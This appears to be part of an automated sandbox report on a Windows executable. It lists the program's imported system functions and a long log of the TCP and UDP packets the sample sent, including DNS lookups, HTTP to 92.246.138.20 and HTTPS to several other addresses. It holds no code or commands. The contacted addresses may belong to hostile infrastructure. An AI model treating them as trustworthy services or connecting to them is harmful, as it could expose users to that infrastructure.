                                                                                    KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                    USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Aug 6, 2024 23:54:23.179416895 CEST4952853192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:23.184622049 CEST53495281.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:23.184798002 CEST4952853192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:23.187560081 CEST4952853192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:23.192468882 CEST53495281.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:23.671905994 CEST53495281.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:23.673203945 CEST4952853192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:23.678637028 CEST53495281.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:23.678687096 CEST4952853192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:43.824517012 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:43.824557066 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:43.824644089 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:43.824985981 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:43.825011969 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:50.577430010 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:50.577459097 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:50.577841997 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:50.578301907 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:50.578319073 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.080216885 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.080730915 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.080744982 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.082175970 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.082231998 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.083573103 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.083650112 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.178836107 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.178844929 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.369811058 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:59.549129009 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:59.551188946 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:59.551215887 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:59.552201033 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:59.552509069 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:59.553854942 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:59.553919077 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:59.760519028 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:59.760772943 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:55:05.970112085 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:55:05.970283031 CEST44349537162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:55:05.970475912 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:55:14.457551003 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:55:14.457618952 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:55:14.457865953 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:55:38.559968948 CEST4953980192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:38.565371037 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:38.565824032 CEST4953980192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:38.566287994 CEST4953980192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:38.566287994 CEST4953980192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:38.571343899 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:38.573542118 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:38.574316978 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:38.574449062 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:39.209877968 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:39.211136103 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:39.211277962 CEST4953980192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:39.216907024 CEST4953980192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:39.221832037 CEST804953992.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:39.349293947 CEST49540443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:39.349329948 CEST44349540194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:39.352998972 CEST49540443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:39.361311913 CEST49540443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:39.361334085 CEST44349540194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.315938950 CEST44349540194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.316382885 CEST49540443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:40.316416979 CEST44349540194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.317567110 CEST44349540194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.317836046 CEST49540443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:40.319192886 CEST49540443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:40.319233894 CEST44349540194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.319282055 CEST49540443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:40.348407984 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:40.348463058 CEST44349541193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:40.348592043 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:40.348786116 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:40.348819971 CEST44349541193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.039324999 CEST44349541193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.039716959 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:41.039798021 CEST44349541193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.040786028 CEST44349541193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.040863991 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:41.041970015 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:41.042022943 CEST44349541193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.042159081 CEST44349541193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.042185068 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:41.042296886 CEST49541443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:41.063132048 CEST49542443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:41.063170910 CEST4434954251.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.063246012 CEST49542443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:41.063579082 CEST49542443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:41.063596964 CEST4434954251.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.737518072 CEST4434954251.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.737859011 CEST49542443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:41.737874985 CEST4434954251.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.739012957 CEST4434954251.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.739099026 CEST49542443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:41.745142937 CEST49542443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:41.745193005 CEST4434954251.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.745269060 CEST49542443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:41.810033083 CEST4954380192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:41.815969944 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.816051006 CEST4954380192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:41.888885975 CEST4954380192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:41.889658928 CEST49544443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:41.889705896 CEST4434954445.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.889766932 CEST49544443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:41.890173912 CEST4954380192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:41.890847921 CEST49544443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:41.890865088 CEST4434954445.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.890965939 CEST4954380192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:41.894285917 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.895096064 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.895245075 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.895272970 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:41.895807028 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.398694038 CEST4434954445.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.399066925 CEST49544443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:42.399084091 CEST4434954445.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.400043011 CEST4434954445.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.400105000 CEST49544443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:42.400806904 CEST49544443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:42.400835037 CEST4434954445.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.400896072 CEST49544443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:42.451284885 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.453438997 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.453505039 CEST4954380192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:42.454513073 CEST4954380192.168.2.492.246.138.20
                                                                                    Aug 6, 2024 23:55:42.467135906 CEST804954392.246.138.20192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.467194080 CEST49545443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.467242002 CEST44349545162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.467295885 CEST49545443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.467571020 CEST49545443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.467587948 CEST44349545162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.475975037 CEST49546443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:42.476042986 CEST44349546194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.476175070 CEST49546443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:42.476459980 CEST49546443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:42.476505041 CEST44349546194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.965699911 CEST44349545162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.966181993 CEST49545443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.966217041 CEST44349545162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.967612982 CEST44349545162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.967685938 CEST49545443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.968486071 CEST49545443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.968537092 CEST44349545162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.968606949 CEST49545443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.977615118 CEST49547443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.977648973 CEST44349547162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:42.977796078 CEST49547443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.978041887 CEST49547443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:42.978055000 CEST44349547162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.462516069 CEST44349546194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.463047981 CEST49546443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:43.463082075 CEST44349546194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.464687109 CEST44349546194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.464782000 CEST49546443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:43.466118097 CEST49546443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:43.466175079 CEST44349546194.15.112.248192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.466315031 CEST49546443192.168.2.4194.15.112.248
                                                                                    Aug 6, 2024 23:55:43.470415115 CEST44349547162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.470973969 CEST49547443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:43.470985889 CEST44349547162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.471867085 CEST49548443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:43.471911907 CEST44349548193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.471995115 CEST49548443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:43.472621918 CEST49548443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:43.472639084 CEST44349548193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.474560022 CEST44349547162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.474644899 CEST49547443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:43.475523949 CEST49547443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:43.475625038 CEST44349547162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:43.475797892 CEST49547443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:43.495682955 CEST49535443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:55:43.495704889 CEST44349535172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.168626070 CEST44349548193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.169029951 CEST49548443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:44.169094086 CEST44349548193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.170578957 CEST44349548193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.170674086 CEST49548443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:44.171518087 CEST49548443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:44.171572924 CEST44349548193.37.215.73192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.171660900 CEST49548443192.168.2.4193.37.215.73
                                                                                    Aug 6, 2024 23:55:44.174041986 CEST49549443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:44.174096107 CEST4434954951.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.174288034 CEST49549443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:44.174544096 CEST49549443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:44.174559116 CEST4434954951.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.811672926 CEST4434954951.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.812244892 CEST49549443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:44.812309980 CEST4434954951.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.813769102 CEST4434954951.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.813843012 CEST49549443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:44.814603090 CEST49549443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:44.814652920 CEST4434954951.38.43.18192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.814704895 CEST49549443192.168.2.451.38.43.18
                                                                                    Aug 6, 2024 23:55:44.819515944 CEST49550443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:44.819551945 CEST4434955045.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:44.819616079 CEST49550443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:44.819933891 CEST49550443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:44.819947004 CEST4434955045.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.304785013 CEST4434955045.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.305267096 CEST49550443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:45.305298090 CEST4434955045.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.308820009 CEST4434955045.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.308890104 CEST49550443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:45.309603930 CEST49550443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:45.309676886 CEST4434955045.55.107.24192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.309729099 CEST49550443192.168.2.445.55.107.24
                                                                                    Aug 6, 2024 23:55:45.318418026 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.318464041 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.318578959 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.318837881 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.318852901 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.846962929 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.847461939 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.847481012 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.850905895 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.851288080 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.852600098 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.852632046 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.852775097 CEST44349551162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.852888107 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.852888107 CEST49551443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859069109 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859114885 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:45.859472990 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859472990 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:45.859518051 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.337018013 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.341561079 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.341594934 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.345105886 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.345323086 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.346602917 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.346672058 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.346985102 CEST44349552162.159.135.232192.168.2.4
                                                                                    Aug 6, 2024 23:55:46.347057104 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.347057104 CEST49552443192.168.2.4162.159.135.232
                                                                                    Aug 6, 2024 23:55:46.363543987 CEST49537443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:55:46.363564014 CEST44349537162.159.61.3192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Aug 6, 2024 23:54:23.176702023 CEST53498841.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:43.810745955 CEST5288653192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:43.812508106 CEST5896853192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:43.820267916 CEST53528861.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:43.821412086 CEST53589681.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:43.823806047 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.186652899 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.326493025 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.326527119 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.329286098 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.330167055 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.330508947 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.330799103 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.334898949 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.335103989 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.335937977 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.436974049 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.436999083 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.437011957 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.437041998 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.437618971 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.437870026 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.446019888 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.446037054 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.485536098 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:44.538856983 CEST44359553172.64.41.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:44.588339090 CEST59553443192.168.2.4172.64.41.3
                                                                                    Aug 6, 2024 23:54:50.551229954 CEST6302153192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:50.551552057 CEST6431753192.168.2.41.1.1.1
                                                                                    Aug 6, 2024 23:54:50.558705091 CEST53643171.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:50.558928967 CEST53630211.1.1.1192.168.2.4
                                                                                    Aug 6, 2024 23:54:50.576237917 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:50.887737036 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.070955038 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.071502924 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.071520090 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.073236942 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.073252916 CEST44360931162.159.61.3192.168.2.4
                                                                                    Aug 6, 2024 23:54:51.076493025 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.076853037 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.078661919 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.079062939 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.079207897 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.079811096 CEST60931443192.168.2.4162.159.61.3
                                                                                    Aug 6, 2024 23:54:51.176996946 CEST44360931162.159.61.3192.168.2.4
